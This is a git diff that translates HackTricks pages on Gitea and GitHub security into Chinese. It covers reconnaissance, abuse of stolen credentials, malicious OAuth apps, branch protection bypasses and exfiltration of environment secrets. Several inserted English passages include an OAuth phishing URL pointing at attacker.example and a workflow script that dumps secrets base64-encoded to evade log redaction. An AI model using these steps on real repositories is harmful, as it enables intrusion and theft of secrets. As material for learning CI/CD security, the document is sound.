could also save the sessions inside the DB). 
-- The **jwt private key** inside the jwt folder -- More **sensitive information** could be found in this folder +如果您在服务器内部,您还可以**使用`gitea`二进制文件**来访问/修改信息: -If you are inside the server you can also **use the `gitea` binary** to access/modify information: - -- `gitea dump` will dump gitea and generate a .zip file -- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence) -- `gitea admin user change-password --username admin --password newpassword` Change the password -- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token +- `gitea dump`将转储gitea并生成一个.zip文件。 +- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET`将生成指定类型的令牌(持久性)。 +- `gitea admin user change-password --username admin --password newpassword`更改密码。 +- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token`创建新管理员用户并获取访问令牌。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md index e6e4d9ba3..6befd4569 100644 --- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md +++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md @@ -4,104 +4,100 @@ ## Basic Structure -The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization. +基本的 Gitea 环境结构是通过 **组织** 来分组仓库,每个组织可以包含 **多个仓库** 和 **多个团队**。然而,请注意,就像在 GitHub 中一样,用户可以在组织外拥有仓库。 -Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**. +此外,**用户** 可以是 **不同组织的成员**。在组织内,用户可能对每个仓库拥有 **不同的权限**。 -A user may also be **part of different teams** with different permissions over different repos. +用户也可以是 **不同团队的一部分**,对不同仓库拥有不同的权限。 -And finally **repositories may have special protection mechanisms**. +最后,**仓库可能具有特殊的保护机制**。 ## Permissions ### Organizations -When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**. +当 **组织被创建** 时,会创建一个名为 **Owners** 的团队,并将用户放入其中。该团队将提供对 **组织的管理员访问**,这些 **权限** 和团队的 **名称** **无法修改**。 -**Org admins** (owners) can select the **visibility** of the organization: +**组织管理员**(所有者)可以选择组织的 **可见性**: -- Public -- Limited (logged in users only) -- Private (members only) +- 公开 +- 限制(仅限登录用户) +- 私有(仅限成员) -**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos. +**组织管理员** 还可以指示 **仓库管理员** 是否可以 **添加或移除团队的访问权限**。他们还可以指示最大仓库数量。 -When creating a new team, several important settings are selected: +创建新团队时,会选择几个重要设置: -- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all. 
-- It's also indicated **if members can create new repos** (creator will get admin access to it) -- The **permissions** the **members** of the repo will **have**: - - **Administrator** access - - **Specific** access: +- 指定 **团队成员可以访问的组织仓库**:特定仓库(团队被添加的仓库)或所有仓库。 +- 还指示 **成员是否可以创建新仓库**(创建者将获得对其的管理员访问权限) +- **成员** 在仓库中将 **拥有的权限**: +- **管理员** 访问 +- **特定** 访问: ![](<../../images/image (118).png>) ### Teams & Users -In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**: +在仓库中,**组织管理员** 和 **仓库管理员**(如果组织允许)可以 **管理分配给协作者(其他用户)和团队的角色**。有 **3** 种可能的 **角色**: -- Administrator -- Write -- Read +- 管理员 +- 写入 +- 读取 ## Gitea Authentication ### Web Access -Using **username + password** and potentially (and recommended) a 2FA. +使用 **用户名 + 密码**,并可能(推荐)使用 2FA。 ### **SSH Keys** -You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) +您可以使用一个或多个公钥配置您的帐户,允许相关的 **私钥代表您执行操作**。 [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys) #### **GPG Keys** -You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**. +您 **无法使用这些密钥冒充用户**,但如果您不使用它,可能会导致您 **因发送未签名的提交而被发现**。 ### **Personal Access Tokens** -You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) +您可以生成个人访问令牌,以 **授予应用程序访问您的帐户**。个人访问令牌对您的帐户具有完全访问权限:[http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications) ### Oauth Applications -Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet: +与个人访问令牌一样,**Oauth 应用程序**将对您的帐户及其访问的地方具有 **完全访问权限**,因为如 [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes) 中所示,范围尚不支持: ![](<../../images/image (194).png>) ### Deploy keys -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. +部署密钥可能对仓库具有只读或写入访问权限,因此它们可能对破坏特定仓库很有趣。 ## Branch Protections -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. +分支保护旨在 **不将仓库的完全控制权授予用户**。目标是在能够在某些分支中编写代码之前 **设置几种保护方法**。 -The **branch protections of a repository** can be found in _https://localhost:3000/\/\/settings/branches_ +**仓库的分支保护** 可以在 _https://localhost:3000/\/\/settings/branches_ 中找到。 > [!NOTE] -> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +> **无法在组织级别设置分支保护**。因此,所有保护必须在每个仓库中声明。 -Different protections can be applied to a branch (like to master): +可以对分支(例如主分支)应用不同的保护: -- **Disable Push**: No-one can push to this branch -- **Enable Push**: Anyone with access can push, but not force push. 
-- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -- **Enable Status checks:** Require status checks to pass before merging. -- **Require approvals**: Indicate the number of approvals required before a PR can be merged. -- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -- **Block merge on official review requests**: If there official review requests it cannot be merged -- **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -- **Require Signed Commits**: Commits must be signed. -- **Block merge if pull request is outdated** -- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes +- **禁用推送**:无人可以推送到此分支 +- **启用推送**:任何有访问权限的人都可以推送,但不能强制推送。 +- **白名单限制推送**:只有选定的用户/团队可以推送到此分支(但不能强制推送) +- **启用合并白名单**:只有白名单中的用户/团队可以合并 PR。 +- **启用状态检查**:合并之前需要通过状态检查。 +- **要求批准**:指示合并 PR 之前所需的批准数量。 +- **限制批准给白名单**:指示可以批准 PR 的用户/团队。 +- **在拒绝审查时阻止合并**:如果请求更改,则无法合并(即使其他检查通过) +- **在官方审查请求时阻止合并**:如果有官方审查请求,则无法合并 +- **撤销过期的批准**:当有新提交时,旧的批准将被撤销。 +- **要求签名提交**:提交必须签名。 +- **如果拉取请求过时则阻止合并** +- **受保护/不受保护的文件模式**:指示要保护/不保护的文件模式 > [!NOTE] -> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +> 如您所见,即使您设法获得某个用户的凭据,**仓库可能受到保护,避免您将代码推送到主分支**,例如,以破坏 CI/CD 管道。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md index cdad12b57..073d04233 100644 --- a/src/pentesting-ci-cd/github-security/README.md +++ b/src/pentesting-ci-cd/github-security/README.md @@ -2,41 +2,41 @@ {{#include ../../banners/hacktricks-training.md}} -## What is Github +## 什么是Github -(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. +(来自 [这里](https://kinsta.com/knowledgebase/what-is-github/)) 从高层次来看,**GitHub是一个网站和基于云的服务,帮助开发者存储和管理他们的代码,以及跟踪和控制代码的更改**。 -### Basic Information +### 基本信息 {{#ref}} basic-github-information.md {{#endref}} -## External Recon +## 外部侦查 -Github repositories can be configured as public, private and internal. +Github 仓库可以配置为公共、私有和内部。 -- **Private** means that **only** people of the **organisation** will be able to access them -- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it -- **Public** means that **all internet** is going to be able to access it. +- **私有**意味着**只有**组织中的人才能访问它们 +- **内部**意味着**只有**企业中的人(一个企业可能有多个组织)才能访问它 +- **公共**意味着**所有互联网**用户都可以访问它。 -In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. +如果你知道**想要攻击的用户、仓库或组织**,你可以使用**github dorks**来查找敏感信息或搜索**每个仓库中的敏感信息泄露**。 ### Github Dorks -Github allows to **search for something specifying as scope a user, a repo or an organisation**. 
Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. +Github 允许**通过指定用户、仓库或组织作为范围来搜索某些内容**。因此,使用一系列将出现在敏感信息附近的字符串,你可以轻松地**搜索目标中的潜在敏感信息**。 -Tools (each tool contains its list of dorks): +工具(每个工具包含其 dorks 列表): -- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) -- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) -- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) +- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks 列表](https://github.com/obheda12/GitDorker/tree/master/Dorks)) +- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks 列表](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) +- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks 列表](https://github.com/hisxo/gitGraber/tree/master/wordlists)) -### Github Leaks +### Github 泄露 -Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). +请注意,github dorks 也旨在使用 github 搜索选项查找泄露。此部分专门介绍那些将**下载每个仓库并搜索其中敏感信息**的工具(甚至检查某些深度的提交)。 -Tools (each tool contains its list of regexes): +工具(每个工具包含其正则表达式列表): - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) - [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) @@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes): - [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) > [!WARNING] -> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! +> 当你在一个仓库中查找泄露并运行类似 `git log -p` 的命令时,不要忘记可能还有**其他分支和其他提交**包含秘密! -### External Forks +### 外部分支 -It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork). +可以通过**滥用拉取请求来妥协仓库**。要知道一个仓库是否脆弱,你主要需要阅读 Github Actions yaml 配置。 [**更多信息见下文**](./#execution-from-a-external-fork)。 -### Github Leaks in deleted/internal forks +### Github 在删除/内部分支中的泄露 -Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: +即使是删除或内部的,也可能从 github 仓库的分支中获取敏感数据。请在此查看: {{#ref}} accessible-deleted-data-in-github.md {{#endref}} -## Organization Hardening +## 组织强化 -### Member Privileges +### 成员权限 -There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). 
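If you already have a token for a member, a quick way to review these defaults is that same Organizations API. The sketch below is an assumption-laden example: the organisation name is a placeholder and only fields known to be returned by `GET /orgs/{org}` are queried:

```bash
# Sketch: audit org-wide member defaults (requires a token with at least read:org)
ORG="target-org"   # placeholder organisation name
curl -s -H "Authorization: Bearer $GITHUB_TOKEN" \
     -H "Accept: application/vnd.github+json" \
     "https://api.github.com/orgs/$ORG" \
  | jq '{default_repository_permission, members_can_create_repositories, members_can_create_pages, members_can_fork_private_repositories, two_factor_requirement_enabled}'
```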
+可以为组织的**成员**分配一些**默认权限**。这些可以从页面 `https://github.com/organizations//settings/member_privileges` 或从 [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs) 控制。 -- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. -- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. -- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. -- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** - - _I couldn't find this info in the APIs response, share if you do_ -- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. - - _I couldn't find this info in the APIs response, share if you do_ -- **More things can be configured** in this page but the previous are the ones more security related. +- **基本权限**:成员将对组织仓库拥有 None/Read/write/Admin 权限。推荐使用**None**或**Read**。 +- **仓库分叉**:如果不必要,最好**不允许**成员分叉组织仓库。 +- **页面创建**:如果不必要,最好**不允许**成员从组织仓库发布页面。如果必要,可以允许创建公共或私有页面。 +- **集成访问请求**:启用后,外部协作者将能够请求访问 GitHub 或 OAuth 应用以访问该组织及其资源。通常是需要的,但如果不需要,最好禁用它。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **仓库可见性更改**:如果启用,具有**管理员**权限的**成员**将能够**更改其可见性**。如果禁用,只有组织所有者可以更改仓库的可见性。如果你**不**希望人们将内容**公开**,请确保此选项**禁用**。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **仓库删除和转移**:如果启用,具有**管理员**权限的成员将能够**删除**或**转移**公共和私有**仓库**。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **允许成员创建团队**:如果启用,任何**成员**都将能够**创建**新**团队**。如果禁用,只有组织所有者可以创建新团队。最好将此选项禁用。 +- _我在 API 响应中找不到此信息,如果你找到了,请分享_ +- **此页面上可以配置更多内容**,但前面的内容与安全性相关性更大。 -### Actions Settings +### Actions 设置 -Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. +可以从页面 `https://github.com/organizations//settings/actions` 配置多个与安全相关的设置。 > [!NOTE] -> Note that all this configurations can also be set on each repository independently +> 请注意,所有这些配置也可以在每个仓库中独立设置 -- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. 
- - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) -- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. - - _I couldn't find an API with this info, share if you do_ -- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. - - _I couldn't find an API with this info, share if you do_ -- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows. - - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) +- **Github actions 策略**:允许你指明哪些仓库可以运行工作流,哪些工作流应该被允许。建议**指定哪些仓库**应该被允许,而不是允许所有操作运行。 +- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +- **来自外部协作者的拉取请求工作流**:建议**要求所有**外部协作者的批准。 +- _我找不到包含此信息的 API,如果你找到了,请分享_ +- **从拉取请求运行工作流**:强烈**不建议从拉取请求运行工作流**,因为分叉源的维护者将获得使用具有读取权限的令牌访问源仓库的能力。 +- _我找不到包含此信息的 API,如果你找到了,请分享_ +- **工作流权限**:强烈建议**仅授予读取仓库权限**。不建议授予写入和创建/批准拉取请求的权限,以避免滥用授予运行工作流的 GITHUB_TOKEN。 +- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) -### Integrations +### 集成 -_Let me know if you know the API endpoint to access this info!_ +_如果你知道访问此信息的 API 端点,请告诉我!_ -- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). -- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). +- **第三方应用访问策略**:建议限制对每个应用的访问,仅允许必要的应用(在审核后)。 +- **已安装的 GitHub 应用**:建议仅允许必要的应用(在审核后)。 -## Recon & Attacks abusing credentials +## 侦查与攻击滥用凭证 -For this scenario we are going to suppose that you have obtained some access to a github account. +在此场景中,我们假设你已经获得了对一个 github 账户的某些访问权限。 -### With User Credentials +### 使用用户凭证 -If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** +如果你以某种方式已经拥有组织内某个用户的凭证,你可以**直接登录**并检查你拥有的**企业和组织角色**,如果你是普通成员,检查普通成员拥有的**权限**、你所在的**组**、你对哪些**仓库**拥有的**权限**以及**这些仓库是如何保护的**。 -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +请注意,**可能会使用 2FA**,因此你只能在能够**通过该检查**的情况下访问此信息。 > [!NOTE] -> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. 
+> 请注意,如果你**设法窃取了 `user_session` cookie**(当前配置为 SameSite: Lax),你可以**完全冒充用户**而无需凭证或 2FA。 -Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. +请查看下面关于 [**分支保护绕过**](./#branch-protection-bypass) 的部分,以防有用。 -### With User SSH Key +### 使用用户 SSH 密钥 -Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to: +Github 允许**用户**设置**SSH 密钥**,作为**代表他们部署代码的身份验证方法**(不应用 2FA)。 +使用此密钥,你可以对用户拥有某些权限的仓库进行**更改**,但是你不能使用它访问 github api 来枚举环境。然而,你可以**枚举本地设置**以获取有关你有访问权限的仓库和用户的信息: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +如果用户将其用户名配置为他的 github 用户名,您可以访问他帐户中设置的 **公钥**,网址为 _https://github.com/\.keys_,您可以检查此内容以确认您找到的私钥是否可以使用。 -If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH 密钥** 也可以在存储库中设置为 **部署密钥**。任何拥有此密钥的人都将能够 **从存储库启动项目**。通常在具有不同部署密钥的服务器上,本地文件 **`~/.ssh/config`** 将提供与密钥相关的信息。 -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG 密钥 -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +如 [**这里**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) 所述,有时需要签署提交,否则您可能会被发现。 +在本地检查当前用户是否有任何密钥: ```shell gpg --list-secret-keys --keyid-format=long ``` +### 使用用户令牌 -### With User Token +有关[**用户令牌的介绍,请查看基本信息**](basic-github-information.md#personal-access-tokens)。 -For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). +用户令牌可以用作**HTTPS下Git的密码**,或用于[**通过基本身份验证对API进行身份验证**](https://docs.github.com/v3/auth/#basic-authentication)。根据附加的权限,您可能能够执行不同的操作。 -A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. +用户令牌的格式如下:`ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` -A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` +### 使用Oauth应用程序 -### With Oauth Application +有关[**Github Oauth应用程序的介绍,请查看基本信息**](basic-github-information.md#oauth-applications)。 -For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). +攻击者可能创建一个**恶意Oauth应用程序**,以访问接受它们的用户的特权数据/操作,可能作为网络钓鱼活动的一部分。 -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. 
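As a hedged illustration of the phishing angle, the consent link for a hypothetical attacker-registered OAuth app only needs to request powerful scopes. The authorize endpoint and the scope names are real; the client id and redirect URI below are made-up placeholders:

```bash
# Hypothetical consent URL an attacker could send to victims (client_id and redirect_uri are placeholders)
CLIENT_ID="attacker_oauth_app_id"
echo "https://github.com/login/oauth/authorize?client_id=${CLIENT_ID}&scope=repo%20admin:org%20workflow&redirect_uri=https://attacker.example/callback"
```

Whether a token obtained this way can reach organisation resources still depends on the third-party application access policy mentioned earlier.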
+这些是[Oauth应用程序可以请求的范围](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps)。在接受之前,应该始终检查请求的范围。 -These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them. +此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问**。 -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +### 使用Github应用程序 -### With Github Application +有关[**Github应用程序的介绍,请查看基本信息**](basic-github-information.md#github-applications)。 -For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). +攻击者可能创建一个**恶意Github应用程序**,以访问接受它们的用户的特权数据/操作,可能作为网络钓鱼活动的一部分。 -An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +此外,如基本信息中所述,**组织可以授予/拒绝第三方应用程序对与组织相关的信息/仓库/操作的访问**。 -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +## 破坏与滥用Github Action -## Compromise & Abuse Github Action - -There are several techniques to compromise and abuse a Github Action, check them here: +有几种技术可以破坏和滥用Github Action,请在此查看: {{#ref}} abusing-github-actions/ {{#endref}} -## Branch Protection Bypass +## 分支保护绕过 -- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). 
- - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. +- **要求一定数量的批准**:如果您破坏了多个帐户,您可能只需从其他帐户接受您的PR。如果您只有创建PR的帐户,则无法接受自己的PR。但是,如果您可以访问仓库中的**Github Action**环境,使用**GITHUB_TOKEN**,您可能能够**批准您的PR**并以这种方式获得1个批准。 +- _注意,对于此以及代码所有者限制,通常用户无法批准自己的PR,但如果您可以,您可以利用它来接受您的PR。_ +- **在推送新提交时撤销批准**:如果未设置此项,您可以提交合法代码,等待有人批准,然后放入恶意代码并将其合并到受保护的分支中。 +- **要求代码所有者的审查**:如果此项已激活且您是代码所有者,您可以让**Github Action创建您的PR,然后自己批准它**。 +- 当**CODEOWNER文件配置错误**时,Github不会抱怨,但也不会使用它。因此,如果配置错误,**代码所有者保护将不适用。** +- **允许指定的参与者绕过拉取请求要求**:如果您是这些参与者之一,您可以绕过拉取请求保护。 +- **包括管理员**:如果未设置此项且您是仓库的管理员,您可以绕过此分支保护。 +- **PR劫持**:您可能能够**修改其他人的PR**,添加恶意代码,自己批准结果PR并合并所有内容。 +- **移除分支保护**:如果您是**仓库的管理员,您可以禁用保护**,合并您的PR并重新设置保护。 +- **绕过推送保护**:如果一个仓库**仅允许某些用户**在分支中发送推送(合并代码)(分支保护可能保护所有分支,指定通配符`*`)。 +- 如果您对仓库**具有写入访问权限,但由于分支保护不允许推送代码**,您仍然可以**创建一个新分支**,并在其中创建一个**在代码推送时触发的github action**。由于**分支保护在分支创建之前不会保护该分支**,因此对该分支的第一次代码推送将**执行github action**。 -## Bypass Environments Protections +## 绕过环境保护 -For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). +有关[**Github环境的介绍,请查看基本信息**](basic-github-information.md#git-environments)。 -In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one). - -Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. +如果一个环境可以**从所有分支访问**,则**没有保护**,您可以轻松访问环境中的机密。请注意,您可能会发现某些仓库**所有分支都受到保护**(通过指定其名称或使用`*`),在这种情况下,**找到一个可以推送代码的分支**,您可以**通过创建新的github action(或修改一个)来提取**机密。 +请注意,您可能会发现边缘情况,其中**所有分支都受到保护**(通过通配符`*`),并且指定了**谁可以向分支推送代码**(_您可以在分支保护中指定_),而**您的用户不被允许**。您仍然可以运行自定义github action,因为您可以创建一个分支并在其上使用推送触发器。**分支保护允许推送到新分支,因此github action将被触发**。 ```yaml push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch +branches: +- current_branch_name #Use '**' to run when a push is made to any branch ``` +注意,**在创建**分支后,**分支保护将适用于新分支**,您将无法修改它,但在那时您已经提取了秘密。 -Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. 
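A minimal end-to-end sketch of the technique described above; the branch, environment and secret names (`attacker-branch`, `production`, `DEPLOY_KEY`) are assumptions you would replace with whatever you enumerate in the target repo:

```bash
# Sketch: you have write access, the existing branches are protected, but new branches are not
git checkout -b attacker-branch
mkdir -p .github/workflows
cat > .github/workflows/env-dump.yml <<'EOF'
name: env-dump
on:
  push:
    branches:
      - attacker-branch
jobs:
  dump:
    runs-on: ubuntu-latest
    # assumption: "production" is the environment holding the secrets you are after
    environment: production
    steps:
      # base64-encode the value so GitHub does not redact it in the job logs
      - run: echo "${{ secrets.DEPLOY_KEY }}" | base64 -w0
EOF
git add .github/workflows/env-dump.yml
git commit -m "ci: add workflow"
git push origin attacker-branch   # this first push already triggers the workflow
```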
